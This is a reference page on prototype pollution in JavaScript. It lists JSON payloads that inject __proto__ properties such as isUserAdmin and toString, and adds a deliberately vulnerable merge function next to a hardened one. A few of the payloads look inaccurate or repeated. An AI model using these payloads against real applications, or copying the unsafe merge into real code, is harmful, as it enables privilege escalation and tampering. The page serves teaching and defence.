Prototype Pollution

Affects Node.js; can also affect client-side JavaScript applications.

Prototype pollution occurs when unsafe merge, clone, extend or path-assignment operations are applied to attacker-controlled JSON objects.

  • It is exploitable only if one of the following three operations is performed on untrusted input:

    • Object recursive merge

    • Property definition by path

    • Object clone

  • Among the most popular libraries that have been affected are lodash and Hoek.

  • Templates are a good target for prototype pollution.

Payloads
  • The most straightforward example of prototype pollution involves injecting the __proto__ property, which affects all objects that inherit from Object.prototype.

This example adds the isUserAdmin property to the prototype chain:
{
  "__proto__": {
    "isUserAdmin": true
  }
}
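The recursive-merge case from the list above, run on the isUserAdmin payload just shown, as an added example that is not from the original page: a deliberately unsafe merge next to a hardened one. The function names unsafeMerge, safeMerge and pollutedBy are my own; it assumes Node.js.

```javascript
// Added example (not from the original page), Node.js: unsafe merge vs. hardened one.
// Vulnerable: walks every key of source, including "__proto__". On a plain object
// target["__proto__"] is Object.prototype, so attacker keys land on the shared prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (typeof value === "object" && value !== null) {
      if (typeof target[key] !== "object" || target[key] === null) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: skips keys that reach the prototype chain, copies only own keys of source,
// recurses only into own keys of target, and builds nested containers with no prototype.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (typeof value === "object" && value !== null) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== "object" || target[key] === null) {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input, as it would arrive from JSON.parse on a request
// body; JSON.parse creates "__proto__" here as an ordinary own property.
const PAYLOAD = JSON.parse('{"__proto__": {"isUserAdmin": true}}');

// Merges PAYLOAD into an empty object and reports whether an unrelated, fresh
// object now inherits isUserAdmin; cleans Object.prototype up afterwards.
function pollutedBy(mergeFn) {
  mergeFn({}, PAYLOAD);
  const leaked = ({}).isUserAdmin === true;
  delete Object.prototype.isUserAdmin;
  return leaked; // true for unsafeMerge, false for safeMerge
}
```

The cleanup in pollutedBy is only there so the demonstration leaves the process in a sane state; a real service has no such chance, which is why the merge itself must refuse the key.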
You can also manipulate Object.prototype directly through the __proto__ property of an object passed to vulnerable code; here the toString property is overwritten:
{
  "__proto__": {
    "toString": "malicious code"
  }
}
If the application allows you to define properties via paths (e.g., obj.a.b):
{
  "a.b.__proto__.isHacked": true
}
The constructor property is part of the prototype chain for JavaScript objects:
{
  "__proto__.constructor": "MaliciousFunction"
}
The hasOwnProperty method is often used to check if an object has a property, but it can be overridden in the prototype:
{
  "__proto__.hasOwnProperty": false
}
If an attacker can reach the prototypes of built-in types (such as Array.prototype or Function.prototype), they can change the behavior of every instance of those types:
{
  "__proto__.length": 1000
}
If the application uses a templating engine and allows user input to be rendered without sanitization, an attacker might inject a prototype pollution payload directly via the template:
{
  "__proto__": {
    "isAdmin": true
  }
}
You can directly inject properties into the prototype of custom classes or objects:
{
  "customObjectPrototype.isHacked": true
}